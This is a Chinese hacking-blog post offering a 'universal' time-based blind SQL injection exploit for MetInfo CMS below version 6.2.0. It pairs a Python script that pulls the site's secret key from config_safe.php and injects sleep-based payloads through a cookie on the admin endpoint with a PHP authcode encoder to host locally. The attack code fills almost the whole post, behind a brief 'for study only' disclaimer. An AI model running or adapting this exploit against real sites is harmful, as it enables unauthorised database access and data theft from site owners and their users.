metinfo通杀SQL盲注利用脚本

  • 内容
  • 相关

小于v6.2.0版本脚本由Spec编写仅,供学习交流使用,请勿恶意攻击他人网站,如非法利用·

#coding=utf-8
import requests
import re
import sys
import time
 
 
#获取config_safe.php中的 key
def getKey(url,headers,local_url):
    try:
        url_key = url + "/config/config_safe.php"
        rsp = requests.get(url_key,headers)
        p = re.compile(r'<\?php\/\*(.*)\*\/\?>')
        p1 = p.findall(rsp.text)
        key = p1[0]
        databaseLen(key,headers,local_url,url)
    except:
        sys.exit("The website is secure!!")
#获取数据库长度
def databaseLen(key,headers,local_url,url):
    for str in range(1,21):
        str = '%d'%str
        payload = "1%27%20or%20if((select%20length(database())="+ str +"),sleep(5),1)%23"
        queryKey(key,headers,payload,local_url,url)
#获取encode后的数据
def queryKey(key,headers,str,local_url,url):
    payload = "key="+key+"&str="+str
    rsp = requests.post(local_url,headers = headers,data = payload)
#   str = rsp.url
#   data = str.replace('+','%20').replace('%28','(').replace('%29',')').replace('%3D','=').replace('%2C',',')
#   print(data)
    getTestUrl(url,rsp.text,headers)
#获取需要测试的URL
def getTestUrl(url,payload,headers):
    params = {'n':'user','m':'web','c':'register','a':'doemailvild'}
    cookies = {'Phpstorm-cd979afe':'49f537dc-5078-4407-a224-9fbd39b31aa6','PHPSESSID':'bba89344cb69a733ca0e20c46d7338b4','p':payload}
    test_url = url + "/admin/index.php"
    rsp = requests.get(test_url,params = params,cookie = cookies)
    str = rsp.url
    getData(str,headers)
#获取数据
def getData(url,headers):
    startTime = time.time();
    rsp = requests.get(url,headers)
    if time.time() - startTime > 4:
        print("ok")
    else:
        pass
if __name__ == '__main__':
    headers = {
        "Content-Type":"application/x-www-form-urlencoded",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"en-US,en;q=0.5"
    }
    url = input("please input URL:")
    if "http://" or "https://" in url:
        local_url = input("请输入本地搭建的encode函数地址:")
        getKey(url,headers,local_url)
    else:
        print("please input the correct url!!")
本地搭建的encode函数源码

<?php
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){
        $ckey_length = 4; 
        $key = md5($key ? $key : UC_KEY);
        $keya = md5(substr($key, 0, 16));
        $keyb = md5(substr($key, 16, 16));
        $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
        $cryptkey = $keya.md5($keya.$keyc);
        $key_length = strlen($cryptkey);
        $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
        $string_length = strlen($string);
        $result = '';
        $box = range(0, 255);
        $rndkey = array();
        for($i = 0; $i <= 255; $i++) {
            $rndkey[$i] = ord($cryptkey[$i % $key_length]);
        }
        for($j = $i = 0; $i < 256; $i++) {
            $j = ($j + $box[$i] + $rndkey[$i]) % 256;
            $tmp = $box[$i];
            $box[$i] = $box[$j];
            $box[$j] = $tmp;
        }
 
        for($a = $j = $i = 0; $i < $string_length; $i++) {
            $a = ($a + 1) % 256;
            $j = ($j + $box[$a]) % 256;
            $tmp = $box[$a];
            $box[$a] = $box[$j];
            $box[$j] = $tmp;
            $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
        }
 
        if($operation == 'DECODE') {
            if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
               return substr($result, 26);
            } else {
               return '';
            }
        }else{
            return $keyc.str_replace('=', '', base64_encode($result));
        }
    }
print_r(urlencode(authcode($_POST['str'],'ENCOUDE',$_POST['key'],0)));

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:metinfo通杀SQL盲注利用脚本 - https://www.0dayhack.com/post-870.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注